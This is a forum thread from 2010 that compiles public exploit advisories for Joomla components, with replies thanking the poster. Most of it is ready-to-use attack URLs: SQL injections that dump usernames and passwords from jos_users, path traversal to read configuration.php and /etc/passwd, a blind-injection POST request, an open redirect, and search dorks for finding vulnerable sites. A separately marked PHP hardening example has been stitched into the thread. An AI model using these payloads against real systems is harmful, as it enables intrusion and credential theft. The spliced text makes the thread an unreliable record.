
Compilation of current Joomla exploits

Posted: 03 Sep 2010, 09:59
by Skillmax
To liven up the section a bit..


Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities:

Code:

---------------------------------------------------------------------------------
Joomla Component JE FAQ Pro : Multiple Remote Blind Sql Injection
---------------------------------------------------------------------------------
 
Author      : Chip D3 Bi0s
Group       : LatinHackTeam
Email & msn : chipdebios[at]gmail[dot]com
Date        : 2010-08-30
Critical Lvl    : Moderate
Impact      : Exposure of sensitive information
Where       : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : JE FAQ Pro
version     : 1.5.0
Price       : 1 year: 13.08$, 2 Year: 18.31$, 3 Year: 23.54$, 4 Year: 26.16$
Developer   : J Extension
License     : GPLv2 or later           type  : Commercial
Date Added  : 28 August 2010
Download    : http://www.jextn.com/joomla-faq-component-extensions-downloads/
Demo        : http://www.joomla-faq-demo.jextn.com/
 
Description     :
 
JE FAQ Pro is an easy to use but powerful and excellent FAQ management component.
Our core competency in our front end and back end features will let you
sit comfortably, because we take care of your FAQ Joomla component
needs. This is where we extend the suitability in Joomla.
 
 
 
Multiple Blind SQL Injection
 
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2[bsql]
 
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2[bsql]
 


Joomla PicSell Component (com_picsell) Local File Disclosure Vulnerability

Code:

# Author: Craw
# Email: [email protected]            
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
 
=======================================================
   
[+] ExploiT :
  
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
  
   
[+] Example :
  
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
  
   
=======================================================
Greetz @ LUXEMBOURG
=======================================================

Joomla 1.5 URL Redirecting Vulnerability

Code:

============================================
Joomla!   (Multiple) ExploiT
 
============================================
 
#  Powered  Joomla! 1.5 & All version Down  (Multiple)
  
  
# Author: Mr.MLL
# Published: 2010-08-24
# Verified: yes
# Download Exploit Code
# Download N/A
  
===
  
  
# Software :  http://www.joomla.org/download.html
# Vendor   :  http://www.joomla.org/
# Contact  :  [email protected]
  
===
 
 
<?php
    }
 
    if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
    // checks for the presence of a return url
    // and ensures that this url is not the registration or login pages
        // If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $return );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) );
        }
    } else {
        // If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $mosConfig_live_site .'/index.php' );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) );
        }
    }
 
} else if ($option == 'logout') {
    $mainframe->logout();
 
    // JS Popup message
    if ( $message ) {
        ?>
 
=========
# ExploiT
  
    http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/
  
  
=========
 

Joomla Component (com_zoomportfolio) SQL Injection Vulnerability

Code:

---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (id) Remote Sql Injection
---------------------------------------------------------------------------------
 
Author      : Chip D3 Bi0s
Group       : LatinHackTeam
Email & msn : [email protected]
Date        : 23 August 2010
Critical Lvl    : Moderate
Impact      : Exposure of sensitive information
Where       : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : Zoom Portfolio --Joomla Portfolio Component
version     : 1.5
Price       : $20.00
Developer   : EGBZOOM
License     : GPLv2 or later           type  : Commercial
Date Added  : 21 August 2010
Download    : http://www.egbzoom.com/joomla-portfolio-component.html
 
Description     :
 
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort. The Component has features like add category,
add images, settings, add portfolio. Zoom Portfolio includes automatic thumbnail creation,
captioning, searching and more. It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presence. It is directed at artists of all walks of life, it is very easy to install
and customize, and it is just simply stunning.
 
-------------------------
 
How to exploit
 
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
 
-------------------------
 

Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities

Code:

Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities
 
 Name              Biblioteca
 Vendor            http://www.cielostellato.info
 Versions Affected 1.0 Beta
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-21
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
Component that allows the automatic management of a
library in electronic format. It can manage books and
their loans through an attractive, simple and usable
graphical user interface.
 
 
II. DESCRIPTION
_______________
 
This component doesn't use the common Joomla functions
to get the parameters' values from GET, POST etc., and
none of these are properly sanitised before being
used in SQL queries.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Multiple Blind SQL Injection
 B) Multiple SQL Injection
  
 
A) Multiple Blind SQL Injection
_______________________________
 
 
The parameter testo passed to bi.php (site and admin
frontends) is properly sanitised before being used in a
SQL query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
 
 
B) Multiple SQL Injection
_________________________
 
The parameter testo passed to stampa.php, pdf.php and
models/biblioteca.php (when "view" is set to "biblioteca")
is properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.
 
 
IV. SAMPLE CODE
_______________
 
A) Multiple SQL Injection
 
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 
http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 
 
V. FIX
______
 
No fix.

Joomla Component com_zina SQL Injection Vulnerability

Code:

# Exploit Title: Joomla Component com_zina SQL Injection Vulnerability
# Date: 21-08-2010
# Author: Th3 RDX
# Software Link:http://www.pancake.org/zina/
# Version:  2.x
# Tested on: Demo Site
# category: webapp
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                   I Love Faith :)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky
(Indishell.in)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Big Hugs to >:D< : Br0wn Sug4r, Sid3^effects, L0rd CruSad3r, Sonic ,
r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
##############################################################################
%//
 
----- [ Founder ] -----
 
        Th3 RDX
 
----- [ E - mail ] -----
 
    [email protected]
 
 
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [Title] -----
 
Joomla Component com_zina SQL Injection Vulnerability
 
----- [ Vendor ] -----
 
http://www.pancake.org/zina/
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [ Injection (s) ] -----
 
----- [ SQL Injection ] -----
 
Put [BSQLi CODE]
 
[Link] http://joomla/index.php?option=com_zina&view=zina&Itemid=9[SQLi CODE]
 
 
 
                                                        %\\
##############################################################################
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN
 
=> c0d3 for motherland, h4ck for motherland
 
==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
 
Bug discovered : 21 August 2010
 
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
#End 0Day#


Joomla Component com_extcalendar Blind SQL Injection Vulnerability

Code:

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
   Joomla Component com_extcalendar Blind SQL Injection Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# Date: 20/08/2010                                                       0
# Author : Lagripe-Dz                                                   1
# contact : [email protected]                                       8
# Home : Algeria                                                       1
# Category: webapps/0day                                               0
# Tested on: [ win xp sp2 ]                                               8
# Dork  allinurl:"com_extcalendar"                                       1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 
[+] Vulnerable File :
http://www.site.com/[PATH]/components/com_extcalendar/cal_popup.php?extmode=view&extid=[BLIND_SQL]
 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
                 Greetz 2 Allah and Ramadan Karim
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

Joomla Component (com_ongallery) SQL Injection Vulnerability

Code:

===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================
   
Author :   _aL_Bayraqim_ 
   
Homepage : http://www.1923turk.com
  
BORDO BERELİLER GRUP KOMUTANLIĞI
 
..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mücahit...!
   
===================================================
  [+]G00gle Dork :index.php?option=com_ongallery
   
[+] Vulnerable File :
   
   
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]
   
   
[+] ExploiT :
   
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
  
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
   
   
===================================================
The martyr came, mortal life a lie; he went, immortality the truth. You carcasses living out your lives, who will resurrect you?..
=================================================== 

Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability

Code:

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability
 
 Name              Jgrid
 Vendor            http://datagrids.clubsareus.org
 Versions Affected 1.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-14
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
DATA GRID Component built on the popular EXTJS Framework.
 
 
II. DESCRIPTION
_______________
 
A parameter is not properly sanitised before being  used
by the require_once function.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Local File Inclusion
  
 
A) Local File Inclusion
_______________________
 
The controller parameter in jgrid.php is not sanitised
before being used by the PHP function require_once().
This allows a guest to include local files. The following
is the affected code:
 
if($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
 
 
IV. SAMPLE CODE
_______________
 
A) Local File Inclusion
 
http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
 
 
V. FIX
______
 
No fix.

Joomla Component (com_equipment) SQL Injection Vulnerability

Code:

# Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability 
# Date : 16 - 8 - 2010 
# Author : Forza-Dz
# Vendor : http://joomlaequipment.com/
# Version : All Versions 
# Tested on : Win Sp2 and Mac
############################################################
Dork = inurl:"com_equipment"
############################################################
--- SQL Injection Vulnerability ---
SQL Injection Vulnerability in component "com_equipment"
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_equipment&view=details&id=[SQL]
or
http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[SQL]
############################################################
===[Injection]===
[SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[SQL] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users--
[SQL] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
############################################################
Greetz @ MCA-CRB All "DZ" "MusliM" 
############################################################
        ======[saha fotorkom]======
############################################################

Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities

Code:

Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities
 
 Name              Teams
 Vendor            http://www.joomlamo.com
 Versions Affected 1_1028_100809_1711
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-10
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
Teams is a base application for entering leagues, teams,
players, uniforms, and games. 
 
 
II. DESCRIPTION
_______________
 
Some parameters are not properly  sanitised before being
used in SQL queries.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Multiple Blind SQL Injection
  
 
A) Multiple Blind SQL Injection
_______________________________
 
Many parameters  are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
 
 
IV. SAMPLE CODE
_______________
 
A) Multiple Blind SQL Injection
 
POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
 
FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task=save&controller=player
 
 
V. FIX
______
 
No fix.

Joomla Yellowpages SQL Injection Vulnerability


Code:

===============================================================
Joomla Component (com_yellowpages) SQL Injection Vulnerability
===============================================================
 
 
# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability
# Date : 9- 8 - 2010
 
# Author : _aL_bayraqim_
 
# BORDO BERELİLER GRUP KOMUTANLIĞI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
############################################################
Dork = inurl:/index.php?option=com_yellowpages
############################################################
--- SQL Injection Vulnerability ---
SQL Injection Vulnerability in component "com_yellowpages"
http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################
#.Son of a Turk, !!..daughter of a Turk !!..Protect your Turkishness!..
############################################################



There are many users who run Joomla.. so they can see some of the flaws it has.. and so they fix them, regards
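As an added example (not from the original post, from the Jgrid component or from the Joomla code quoted above), the two code patterns shown in the compilation can be hardened as follows: controller loading through an allowlist instead of a raw request value in `require_once`, and a post-login redirect that only accepts relative paths on the same site. The controller directory and controller names are assumed values.

```php
<?php
// Added example: hardened versions of the two patterns quoted in the post.
// Directory and controller names are assumptions for illustration only.
const CONTROLLER_DIR = '/var/www/html/components/com_example/controllers';
const ALLOWED_CONTROLLERS = ['default', 'grid', 'export'];

// 1. Controller loading. The raw value is never used to build a path:
//    it must match an allowlisted name exactly, which rules out '../'
//    traversal and null-byte suffixes before any file lookup happens.
function resolveController(?string $requested): ?string
{
    if ($requested === null || $requested === '') {
        $requested = 'default';
    }
    if (!in_array($requested, ALLOWED_CONTROLLERS, true)) {
        return null; // caller should respond with an error, not include anything
    }
    return CONTROLLER_DIR . '/' . $requested . '.php';
}

// 2. Post-login redirect. The 'return' value is only honoured when it is a
//    plain relative path on this site; anything with a scheme, a
//    protocol-relative prefix or control characters falls back to the start page.
function safeReturnUrl(?string $return, string $liveSite): string
{
    $fallback = $liveSite . '/index.php';
    if ($return === null || $return === '') {
        return $fallback;
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $return)  // has a URL scheme
        || substr($return, 0, 2) === '//'               // protocol-relative
        || substr($return, 0, 2) === '/\\'              // backslash variant
        || preg_match('/[\x00-\x1f\x7f]/', $return)) {   // CR/LF, NUL, etc.
        return $fallback;
    }
    // Keep the rule from the quoted code: never bounce back to login/registration.
    if (strpos($return, 'com_registration') !== false
        || strpos($return, 'com_login') !== false) {
        return $fallback;
    }
    return $liveSite . '/' . ltrim($return, '/');
}

// Constructed inputs mirroring the payload shapes quoted in the post.
var_dump(resolveController('grid'));                      // ".../controllers/grid.php"
var_dump(resolveController("../../../../etc/passwd\0"));  // NULL
var_dump(safeReturnUrl('index.php?option=com_content&id=4', 'https://example.org'));
var_dump(safeReturnUrl('http://Google.com/', 'https://example.org')); // start page
```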

Re: Compilation of current Joomla exploits

Posted: 16 Mar 2011, 17:53
by hackerox2
Thanks a lot, Enigmatic!

I'll save this compilation in case it's ever needed


regards

Re: Compilation of current Joomla exploits

Posted: 16 Mar 2011, 20:30
by deck
I'll tell you the same thing as in the other post: why are you reopening it, if it's from Sep 2010?